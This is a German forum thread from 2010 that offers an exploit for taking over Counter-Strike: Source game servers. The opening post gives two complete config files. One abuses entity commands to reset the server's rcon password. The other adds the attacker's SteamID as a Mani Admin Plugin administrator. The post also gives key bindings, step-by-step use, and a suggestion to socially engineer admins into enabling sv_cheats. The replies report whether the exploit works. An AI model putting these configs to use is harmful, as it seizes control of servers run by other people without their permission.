[Exploit] rCon hack (CS:S)

STADDECX · 05/07/2010, 17:55

Hallo liebe leute

Hab in einem anderen Forum ein netten Exploit entdeckt, mit dem man das rCon (remote control) PW von einem Server "hacken" kann.

Einziges Manko: sv_cheats muss auf "1" stehen.

[Server mit sv_cheats 1 findet ihr hier:

]

Ansonsten müsst ihr versuchen mittels "Social engineering" den Admin darum bitten oder nett fragen, ob er sv_cheats 1 macht

Nungut, fangen wir einfach mal an

Vorbereitung:

Als erstes müsst ihr die ingame console aktivieren, das tut ihr wie folgt:

Öffnet euer Steam, navigiert zu Bibliothek (Libraries), macht Rechtsklick auf "Counter-Strike Source" -> Eigenschaften (Properties) -> Start-Optionen Festlegen (Set Start options) und fügt dort einfach "-console" hinzu.
Das ganze sollte nun so aussehen (bei mir sind noch zusätzliche Parameter mit drin

)

Spoiler

Nun erstellt ihr 2 .cfg's (configs) [Erweiterung bei bekannten Dateitypen ausblenden, wisst ihr ja :P - Hoffentlich!) in dem Ordner "C:/Programme/Steam/Steamapps/[EUER NAME]/counter-strike source/cstrike/cfg"

Die erste Config nennt ihr "rconhack.cfg" und füllt sie mit folgendem Inhalt:

Quote:

ent_create logic_timer
ent_fire logic_timer addoutput "targetname taketimer"
ent_fire taketimer toggle
ent_fire taketimer addoutput "refiretime 0.01"
ent_fire taketimer enable
ent_fire taketimer addoutput "startdisabled 0"
ent_fire taketimer addoutput "UseRandomTime 0"
ent_fire point_servercommand kill
give point_servercommand
ent_setname point_clientcommand point_servercommand
wait
ent_fire taketimer addoutput "ontimer point_servercommand,command,rcon_password rhack"
wait
rcon_password rhack
say R

die zweite config nennt ihr "giveadmin.cfg" und füllt sie hiermit:

Quote:

rcon ma_client addclient "A01"
wait
wait
rcon ma_client addsteam "A01" "STEAM_X:X:XXXXXXXX"
wait
wait
rcon ma_client setaflag "A01" "+#"
wait
wait
rcon ma_client setiflag "A01" "+#"
say A

Rot = eure SteamID eintragen (bekommt ihr raus, indem ihr auf einen Server connected und in der console "status" eingebt, nun sucht ihr euren Nickname, direkt gefolgt von eurer SteamID)

Das Exploiten:

Startet euer Game und gebt in die console folgendes ein:

bind "F1" "exec rconhack.cfg"
bind "F2" "exec giveadmin.cfg"
bind "F3" "admin" (Ist nur sekundär und auch nur ausführbar, wenn "Mani Admin Plugin" auf dem Server ist)

[Die F-Tasten können durch jede beliebige Taste ersetzt werden]

Jetzt sucht ihr euch einen Server auf dem sv_cheats 1 an ist, connected und drückt "F1", wartet etwas (ca. 5 sek) und drückt dann direkt "F2".
Nun seid ihr als rcon eingeloggt und könnt jegliche rcon cvars ausführen

Ein paar cvar's:

Spoiler

Hoffe konnte helfen und das gabs hier noch nicht

PS: Beide .cfg's im Anhang als Download

Gentleman Jack · 05/09/2010, 03:16

Quote:

Originally Posted by STADDECX

Einziges Manko: sv_cheats muss auf "1" stehen.

Server aufdenen Bullettime aktiviert ist stehen am runde ende immer für ein paar sekunden aus sv_cheats 1.

~~FatalScythe~~ · 05/09/2010, 21:59

Es gibt auch einen weg ohne das sv_cheats 1 an ist. Weiß leider nicht wie, aber es geht.

'_Critical_Error___# · 05/10/2010, 22:20

also i.wie funzt das bei mir nicht.
ich mache die 2 cfg's, binde die auf F1 + F2 und admin hab ich schon länger auf Z .
dann klicke ich F1 und es kommt sofort im chat : R
dann klicke ich F2 und es kommt nach paar seks im chat : A

dann try ich ins mani zu kommen, funzt aber nit.
und wenn ich bsp. rcon sv_gravity 150 mache, dann kommt eben dass das nur der admin kann.

PS: während F1 arbeitet kommt auch paar mal: bad rcon password

Lg
CriTicaL

druideka · 05/11/2010, 18:03

bei mir funzt dett nüsch

antrix99 · 05/11/2010, 22:05

bei mir funzt es auf bis jetzt garkeinen server...immer durch das bad passwort gebannt ^^

~~FatalScythe~~ · 05/15/2010, 22:25

Das geht auch nur auf server mit sv_cheats 1. Es gibt umfangreichere exlpoits die in lua geschrieben sind damit geht alles auch mit sv_cheats 0

Aimox · 06/03/2010, 19:15

ehm stimmt des das man dafür vac gebannt wird?
weil man die cfg verändert hat?

Aimox · 06/03/2010, 19:19

ich habe das hier gesehn:

und wo anders gelesen das man dafür vac gebannt werden kann?
weil man die cfg verändert hat usw.
stimmt das?^^

Aimox · 06/03/2010, 19:45

sry hab falsch geschrieben habs bei dir kommentiert wollte eigennen eintrag machen

bladerofdarknes · 06/15/2010, 18:12

ich habs auf nem server mit bullettime getestet wie Gentleman Jack vorgeschlagen hatte, funzte bei mir leider nicht

naja den anderen viel erfolg ^^

PH34 · 06/21/2010, 17:28

FUnzt bei mir leider nicht.

quivar · 06/23/2010, 11:47

Fragt nen Freund, wenn er einen server hat, ob er kurz mal sv_cheats 1 macht, es klappt dort 100%ig..

habs vor kurzem auf dem server von shadow versucht (siehe mein thread mit den scripts) auf seinem server gings ohne probleme

gg95 · 12/30/2010, 20:45

geht nicht

Jul777 · 01/06/2011, 13:58

funktioniert einwandfrei auf sv_cheats 1 servern